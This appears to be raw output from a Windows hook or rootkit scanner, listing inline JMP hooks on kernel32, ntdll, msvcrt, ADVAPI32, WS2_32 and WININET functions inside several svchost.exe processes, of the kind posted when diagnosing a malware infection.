.text           C:\Windows\System32\svchost.exe[1316] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00D8004A 

.text           C:\Windows\System32\svchost.exe[1316] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00D80FB9 

.text           C:\Windows\System32\svchost.exe[1316] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00D80FEF 

.text           C:\Windows\System32\svchost.exe[1316] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00D80FA8 

.text           C:\Windows\System32\svchost.exe[1316] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00D8005B 

.text           C:\Windows\System32\svchost.exe[1316] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00D8000A 

.text           C:\Windows\System32\svchost.exe[1316] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00D80FD4 

.text           C:\Windows\System32\svchost.exe[1316] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00D80025 

.text           C:\Windows\System32\svchost.exe[1316] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 01000FEF 

.text           C:\Windows\system32\svchost.exe[1336] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00B9000A 

.text           C:\Windows\system32\svchost.exe[1336] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00B90FCA 

.text           C:\Windows\system32\svchost.exe[1336] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00B90FE5 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 009200C5 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 009200A0 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 009200FB 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 009200E0 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00920085 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 0092001E 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00920039 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00920F75 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00920FAB 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00920FCD 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00920FBC 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00920054 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00920F9A 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 00920F49 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00920FDE 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00920FEF 

.text           C:\Windows\system32\svchost.exe[1336] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 00920F64 

.text           C:\Windows\system32\svchost.exe[1336] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 01360F92 

.text           C:\Windows\system32\svchost.exe[1336] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 01360FA3 

.text           C:\Windows\system32\svchost.exe[1336] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 01360FD2 

.text           C:\Windows\system32\svchost.exe[1336] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 01360FEF 

.text           C:\Windows\system32\svchost.exe[1336] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 0136001D 

.text           C:\Windows\system32\svchost.exe[1336] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 0136000C 

.text           C:\Windows\system32\svchost.exe[1336] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00B80065 

.text           C:\Windows\system32\svchost.exe[1336] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00B80FCD 

.text           C:\Windows\system32\svchost.exe[1336] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00B80FEF 

.text           C:\Windows\system32\svchost.exe[1336] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00B80054 

.text           C:\Windows\system32\svchost.exe[1336] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00B80FA8 

.text           C:\Windows\system32\svchost.exe[1336] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00B8001E 

.text           C:\Windows\system32\svchost.exe[1336] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00B80FDE 

.text           C:\Windows\system32\svchost.exe[1336] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00B80039 

.text           C:\Windows\system32\svchost.exe[1336] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 013B0FEF 

.text           C:\Windows\system32\svchost.exe[1476] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00160000 

.text           C:\Windows\system32\svchost.exe[1476] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00160FE5 

.text           C:\Windows\system32\svchost.exe[1476] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00160011 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00140F43 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00140F54 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00140F06 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 00140F21 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 0014006E 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00140FB9 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 0014000A 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 0014007F 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!LoadLibraryExW                                                                    76B39109 3 Bytes  JMP 0014005D 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!LoadLibraryExW + 4                                                                76B3910D 1 Byte  [89]

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00140F9E 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00140040 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00140025 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00140F6F 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 00140EF5 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00140FD4 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00140FEF 

.text           C:\Windows\system32\svchost.exe[1476] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 00140F32 

.text           C:\Windows\system32\svchost.exe[1476] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 002C0FC8 

.text           C:\Windows\system32\svchost.exe[1476] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 002C0FD9 

.text           C:\Windows\system32\svchost.exe[1476] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 002C0038 

.text           C:\Windows\system32\svchost.exe[1476] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 002C0000 

.text           C:\Windows\system32\svchost.exe[1476] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 002C0049 

.text           C:\Windows\system32\svchost.exe[1476] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 002C001D 

.text           C:\Windows\system32\svchost.exe[1476] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 0015007D 

.text           C:\Windows\system32\svchost.exe[1476] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 0015005B 

.text           C:\Windows\system32\svchost.exe[1476] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 0015000A 

.text           C:\Windows\system32\svchost.exe[1476] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 0015006C 

.text           C:\Windows\system32\svchost.exe[1476] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00150FC0 

.text           C:\Windows\system32\svchost.exe[1476] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00150040 

.text           C:\Windows\system32\svchost.exe[1476] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00150025 

.text           C:\Windows\system32\svchost.exe[1476] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00150FE5 

.text           C:\Windows\system32\svchost.exe[1476] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 002D000A 

.text           C:\Windows\system32\svchost.exe[1564] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 005B000A 

.text           C:\Windows\system32\svchost.exe[1564] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 005B0025 

.text           C:\Windows\system32\svchost.exe[1564] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 005B0FEF 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00580093 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00580082 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 005800A4 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 00580F0D 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00580056 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00580FD4 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00580FB9 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00580071 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00580F72 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00580F9E 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00580F83 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00580025 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00580F61 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 005800B5 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 0058000A 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00580FE5 

.text           C:\Windows\system32\svchost.exe[1564] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 00580F28 

.text           C:\Windows\system32\svchost.exe[1564] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00610FAD 

.text           C:\Windows\system32\svchost.exe[1564] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00610038 

.text           C:\Windows\system32\svchost.exe[1564] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00610FE3 

.text           C:\Windows\system32\svchost.exe[1564] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 0061000C 

.text           C:\Windows\system32\svchost.exe[1564] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00610FC8 

.text           C:\Windows\system32\svchost.exe[1564] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 0061001D 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 005A0F9B 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 005A0FB6 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 005A0000 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 005A0033 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 005A0062 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 005A0022 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 005A0011 

.text           C:\Windows\system32\svchost.exe[1564] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 005A0FC7 

.text           C:\Windows\system32\svchost.exe[1564] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 00620FEF 

.text           C:\Windows\system32\svchost.exe[1564] WININET.dll!InternetOpenA                                                                      76F34E2B 5 Bytes  JMP 00590000 

.text           C:\Windows\system32\svchost.exe[1564] WININET.dll!InternetOpenUrlA                                                                   76F3BFCE 5 Bytes  JMP 0059002F 

.text           C:\Windows\system32\svchost.exe[1564] WININET.dll!InternetOpenW                                                                      76F6C03E 5 Bytes  JMP 00590FEF 

.text           C:\Windows\system32\svchost.exe[1564] WININET.dll!InternetOpenUrlW                                                                   76F9D722 5 Bytes  JMP 00590040 

.text           C:\Windows\system32\svchost.exe[1764] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 01060000 

.text           C:\Windows\system32\svchost.exe[1764] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 0106002F 

.text           C:\Windows\system32\svchost.exe[1764] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 01060FEF 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 01000075 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 01000064 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 010000A1 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 01000090 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 01000049 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 01000011 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 01000FB6 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 01000F43 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 01000F6F 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 01000022 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 01000F80 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 01000FA5 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 01000F54 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 01000EEF 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 01000000 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 01000FE5 

.text           C:\Windows\system32\svchost.exe[1764] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 01000F1E 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00440FB2 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 0044003D 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00440011 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00440000 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 0044002C 

.text           C:\Windows\system32\svchost.exe[1764] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00440FD7 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 01010FB9 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 01010FDB 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 01010000 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 01010FCA 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 01010FA8 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 0101002C 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 0101001B 

.text           C:\Windows\system32\svchost.exe[1764] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 0101003D 

.text           C:\Windows\system32\svchost.exe[1764] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 010F0FEF 

.text           C:\Windows\system32\svchost.exe[1988] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 003D0FEF 

.text           C:\Windows\system32\svchost.exe[1988] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 003D0014 

.text           C:\Windows\system32\svchost.exe[1988] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 003D0FD4 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 003200B3 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00320F63 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 003200FA 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 003200E9 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00320FA0 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 0032002C 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 0032003D 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00320F74 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00320084 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00320FC7 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00320069 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 0032004E 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00320F8F 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 0032010B 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00320011 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00320000 

.text           C:\Windows\system32\svchost.exe[1988] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 003200CE 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 002E0016 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 002E0F95 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 002E0FB7 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 002E0FEF 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 002E0FA6 

.text           C:\Windows\system32\svchost.exe[1988] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 002E0FDE 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00370F91 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00370033 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00370FE5 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00370FAC 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00370F76 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00370011 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00370000 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00370022 

.text           C:\Windows\system32\svchost.exe[1988] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 003C0000 

.text           C:\Windows\system32\svchost.exe[2272] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00150000 

.text           C:\Windows\system32\svchost.exe[2272] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00150025 

.text           C:\Windows\system32\svchost.exe[2272] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00150FE5 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 0010009A 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00100F54 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00100F25 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 001000BC 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00100075 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00100011 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00100FCA 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00100F65 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00100064 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 0010002C 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00100047 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00100FA5 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00100F80 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 001000D7 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00100FDB 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00100000 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 001000AB 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 000B0042 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 000B0027 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 000B0FD2 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 000B000C 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 000B0FC1 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 000B0FEF 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00130F9A 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00130FBC 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00130FEF 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00130FAB 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00130F89 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00130FCD 

